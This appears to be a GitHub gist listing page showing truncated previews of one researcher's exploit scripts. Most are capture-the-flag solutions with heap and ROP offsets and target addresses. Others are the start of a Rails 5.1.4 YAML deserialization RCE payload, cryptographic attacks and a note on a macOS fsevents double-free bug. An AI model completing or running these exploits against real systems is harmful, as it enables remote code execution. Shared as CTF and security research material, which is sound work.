Niklas Baumstark niklasb
niklasb
/ gist:b5280bc856bfc94157b760eb962e7b60
Created
December 31, 2018 22:24
— forked from wmliang/gist:36b3e6a8d59875cc9f2b20a952bb8890
35c3ctf pwndb exploit
View gist:b5280bc856bfc94157b760eb962e7b60
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| #-*- coding: utf-8 -*- | |
| from pwn import * | |
| import re | |
| import sys | |
| import string | |
| import itertools | |
| # UAF in IndexCursor |
niklasb
/ railspwn.rb
Last active
March 7, 2021 12:14
Rails 5.1.4 YAML unsafe deserialization RCE payload
View railspwn.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'yaml' | |
| require 'base64' | |
| require 'erb' | |
| class ActiveSupport | |
| class Deprecation | |
| def initialize() | |
| @silenced = true | |
| end | |
| class DeprecatedInstanceVariableProxy |
View gracias.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import continued_fraction, Integer, inverse_mod | |
| pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
niklasb
/ handicraft.py
Created
September 10, 2017 20:46
View handicraft.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import * | |
| import base64 | |
| def factor(n,b): | |
| M=1 | |
| print 'start' | |
| a = 2 | |
| i=0 | |
| for q in primes(b): | |
| i+=1 |
niklasb
/ gracias.py
Last active
October 10, 2018 11:17
View gracias.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import continued_fraction, Integer, inverse_mod | |
| pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
niklasb
/ ctfzone_pwn.py
Created
July 18, 2017 15:56
View ctfzone_pwn.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # First stage: unsafe unlink | |
| # Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption | |
| from pwn import * | |
| import struct | |
| import sys | |
| offset_close = 0x00000000000f78b0 | |
| offset_env = 0x3c6f38 |
View sigserver.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Implementation based on attack from | |
| # http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf | |
| import socket | |
| import telnetlib | |
| import random | |
| from hashlib import sha1 | |
| from sage.all import inverse_mod, matrix, vector | |
| TARGET = ('185.143.173.36', 1337) | |
| sock=socket.create_connection(TARGET) |
niklasb
/ gist:416b333cb973812b39c085a42f5c19c4
Last active
April 3, 2017 18:59
View gist:416b333cb973812b39c085a42f5c19c4
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0. | |
| static int | |
| fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx) | |
| { | |
| fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data; | |
| int ret = 0; | |
| fsevent_dev_filter_args64 *devfilt_args, _devfilt_args; | |
| OSAddAtomic(1, &fseh->active); |
niklasb
/ robot_pwnage.py
Last active
August 6, 2017 05:13
Exploit for 'wheel of robots' from insomni'hack 2017
View robot_pwnage.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| # https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py | |
| from pwnlib.tools import * | |
| TARGET=('localhost',5000) | |
| INTERVAL=0 | |
| offset_free = 549184 | |
| offset_system = 0x456d0 |
View baby.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import telnetlib | |
| import time | |
| import struct | |
| import sys | |
| TARGET=('localhost', 1337) | |
| offset___libc_start_main_ret = 0x203f1 | |
| offset_system = 0x00000000000456d0 |
NewerOlder